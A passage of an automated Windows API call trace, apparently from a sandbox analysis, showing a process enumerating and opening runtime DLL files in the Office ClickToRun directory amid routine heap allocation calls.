lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0074.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.272] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.272] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x58c0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-convert-l1-1-0.dll", cAlternateFileName="APFD9C~1.DLL")) returned 1 [0074.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0074.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0074.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cea0 [0074.272] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d4d0 [0074.272] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cea0 | out: hHeap=0x20000) returned 1 [0074.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0074.273] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d4d0 | out: hHeap=0x20000) returned 1 [0074.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfd0 [0074.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cac0 [0074.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0074.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cac0 | out: hHeap=0x20000) returned 1 [0074.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0074.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5c940 [0074.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0074.274] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5c940 | out: hHeap=0x20000) returned 1 [0074.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0074.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e250 [0074.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.274] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e250 | out: hHeap=0x20000) returned 1 [0074.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.275] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0074.275] AreFileApisANSI () returned 1 [0074.275] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 92 [0074.275] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.275] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.276] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0074.276] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0074.277] AreFileApisANSI () returned 1 [0074.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.277] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 92 [0074.278] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.278] GetFileType (hFile=0x430) returned 0x1 [0074.278] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.279] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.280] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.280] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.281] CloseHandle (hObject=0x430) returned 1 [0074.281] AreFileApisANSI () returned 1 [0074.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.282] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 92 [0074.282] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.282] GetFileType (hFile=0x430) returned 0x1 [0074.282] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.283] CloseHandle (hObject=0x430) returned 1 [0074.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.283] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.283] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.284] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0074.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0074.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0074.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.284] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0074.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0074.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0074.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0074.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0074.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0074.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0074.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0074.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.285] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0074.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.285] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0074.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0074.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0074.286] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d268 [0074.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cef8 [0074.286] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0074.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cef8 | out: hHeap=0x20000) returned 1 [0074.287] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d268 | out: hHeap=0x20000) returned 1 [0074.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0074.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0074.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0074.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0074.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d478 [0074.288] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d000 [0074.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d478 | out: hHeap=0x20000) returned 1 [0074.288] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0074.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0074.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d058 [0074.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d000 | out: hHeap=0x20000) returned 1 [0074.289] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d688 [0074.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d058 | out: hHeap=0x20000) returned 1 [0074.289] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d688 | out: hHeap=0x20000) returned 1 [0074.290] AreFileApisANSI () returned 1 [0074.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 92 [0074.290] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb8) returned 0x5a6b8 [0074.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=92 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll") returned 92 [0074.290] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-convert-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-convert-l1-1-0.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x58c0)) returned 1 [0074.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0074.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.291] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a30 | out: hHeap=0x20000) returned 1 [0074.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.291] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.292] FindNextFileW (in: hFindFile=0x78710, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80a0ce4e, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80a0ce4e, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x4ac0, dwReserved0=0x313f518, dwReserved1=0x2000002, cFileName="api-ms-win-crt-environment-l1-1-0.dll", cAlternateFileName="APC00F~1.DLL")) returned 1 [0074.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dea8 [0074.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.292] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0074.292] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dea8 | out: hHeap=0x20000) returned 1 [0074.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x46a58 [0074.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0074.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0074.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d580 [0074.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d528 [0074.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d580 | out: hHeap=0x20000) returned 1 [0074.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0074.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46a58 | out: hHeap=0x20000) returned 1 [0074.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d528 | out: hHeap=0x20000) returned 1 [0074.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0074.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0074.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0074.293] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0074.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0074.293] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cb40 [0074.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0074.294] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cb40 | out: hHeap=0x20000) returned 1 [0074.294] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cdf0 [0074.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6df20 [0074.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cd40 [0074.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6df20 | out: hHeap=0x20000) returned 1 [0074.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cd40 | out: hHeap=0x20000) returned 1 [0074.295] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x80a30 [0074.295] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.295] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x80a30 | out: hHeap=0x20000) returned 1 [0074.297] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cdf0 | out: hHeap=0x20000) returned 1 [0074.297] AreFileApisANSI () returned 1 [0074.297] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll", lpUsedDefaultChar=0x0) returned 96 [0074.297] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71a30 [0074.297] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.298] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0074.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0074.298] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0074.300] AreFileApisANSI () returned 1 [0074.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0074.300] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.300] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=96 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 96 [0074.300] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.302] GetFileType (hFile=0x430) returned 0x1 [0074.302] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.303] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0074.303] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0074.303] SetFilePointerEx (in: hFile=0x430, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0074.303] CloseHandle (hObject=0x430) returned 1 [0074.303] AreFileApisANSI () returned 1 [0074.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 96 [0074.303] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xc0) returned 0x5a6b8 [0074.303] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71a30, cbMultiByte=-1, lpWideCharStr=0x5a6b8, cchWideChar=96 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll") returned 96 [0074.303] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\api-ms-win-crt-environment-l1-1-0.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\api-ms-win-crt-environment-l1-1-0.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x430 [0074.304] GetFileType (hFile=0x430) returned 0x1 [0074.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0074.304] CloseHandle (hObject=0x430) returned 1 [0074.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0074.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0074.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0074.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0074.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0074.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0074.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0074.304] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0074.304] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0074.304] HeapFree (in: 